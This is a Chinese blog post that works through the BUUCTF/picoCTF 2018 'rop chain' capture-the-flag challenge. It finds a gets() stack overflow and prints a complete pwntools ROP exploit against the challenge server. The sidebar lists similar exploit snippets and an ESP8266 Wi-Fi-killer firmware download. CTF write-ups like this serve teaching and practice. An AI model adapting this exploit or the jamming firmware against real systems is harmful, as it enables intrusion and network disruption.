[BUUCTF-pwn]——picoctf_2018_rop chain

最新推荐文章于 2023-09-16 21:32:14 发布
最新推荐文章于 2023-09-16 21:32:14 发布
阅读量199 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114004989
版权

[BUUCTF-pwn]——picoctf_2018_rop chain

checksec看看,开启了NX,但是没有canary
在这里插入图片描述

IDA中查看一下
在这里插入图片描述
发现gets函数,可以栈溢出
在这里插入图片描述
发现flag,不过需要满足条件,才可以获得
在这里插入图片描述
接着找可能用到的函数
在这里插入图片描述
在这里插入图片描述

接着找到对应函数的地址

思路

利用栈溢出,构造rop链,首先将win1 = 1, 然后 win2 = 1,最后获得flag

exploit

from pwn import *
p = remote("node3.buuoj.cn",25806)
win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B
vuln = 0x08048714
payload = 'a' * (0x18 + 4) + p32(win_function1) + p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
p.sendlineafter("Enter your input> ", payload)
p.interactive()

想要知道0xBAAAAAAD 和 0xDEADBAAD怎么来的,可以

点击我查看

https://blog.csdn.net/Y_peak/article/details/114004550

Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1296
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 980
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 1013
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3310
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
buuctf -picoctf_2018_rop chain
fuiifiuiii的博客
09-16 130
很明显,已经将flag打开并输入到了s里,而想要输出就需要让win1==1、win2==1,以及a1=0xdeadbaad。显然a1是可以由我们自行传入的参数(即a1可控)如此来看,逻辑就很清晰了,从vuln栈溢出跳转到win1,返回到vuln,跳转到win2并携带参数a1,返回到vuln,跳转到flag函数并携带参数a1(这个与上一个不同)win2这里也有一些要求,即要求win1==1、a1=0xbaaaaaad,这样可以使得win2置1.看flag函数的逻辑顺序。简单明了,win1=1。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 434
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1502
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
Wi-PWN.ino.CH.bin
02-10
esp8266杀手固件
huaweibeifen8.0_.rar
05-29
华为8.0版本的备份apk,它可以备份应用数据,比如可以备份微信应用数据,然后你可以利用自己的微信数据做词云等东西。
BUUCTF pwn——picoctf_2018_rop chain
CNS-Enterprise BCC-1701-J
04-26 582
BUUCTF 做题练习
BUUCTFPWNpicoctf_2018_rop chain
m0_55368674的博客
01-19 200
ret2text
BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
餐桌上的猫
03-25 116
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/2018_rop') p=remote('node4.buuoj.cn',26218) main=0x80484C6 write_plt=elf.plt['write'] write_got=elf.got['write'] payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3
Buuctf(pwn) picoctf_2018_rop chain 栈溢出
半岛铁盒的博客
08-19 299
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag from pwn import * r = remote("node3.buuoj.cn", 26602) win_function1 = 0x080485CB win_function2 = 0x080485D8 fla.
picoctf_2018_rop chain
、moddemod
07-06 654
exp from pwn import * context.log_level = 'debug' proc_name = './PicoCTF_2018_rop_chain' p = remote('node3.buuoj.cn', 27027) elf = ELF(proc_name) flag_addr = elf.sym['flag'] win_function1 = elf.sym['win_function1'] win_function2 = elf.sym['win_function2'
BUUOJ PWN picoctf_2018_rop chain
weixin_50287973的博客
11-07 193
EXP1 from pwn import* from LibcSearcher import LibcSearcher #p=process("./PicoCTF_2018_rop_chain") p=remote("node3.buuoj.cn",25091) elf=ELF('./PicoCTF_2018_rop_chain') start=0x080484D0 payload=(0x18+4)*'a'+p32(elf.plt['puts'])+p32(start)+p32(elf.got['put
ESP8266开发板刷WI-PWN固件(wifi杀手)教程(详细)
热门推荐
qq_42294237的博客
08-25 3万+
材料: ESP8266开发板(废话) Micro-usb数据线一根(用于电脑和esp8266通讯) 电脑 ESP8266 CH340驱动 准备文件: 如果没有,可以去我的首页下载,也可以去官方的Github仓库下载 顺便说一下这两个文件的区别第二个带OLED的,第一个不带的,可随便选择 开整 首先需要烧录固件的软件:ESP8266FLASHER 当然,如果你不喜欢,也可以选择官方的烧录工具:flash_download_tool 我这里就拿ESP8266FLASH...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值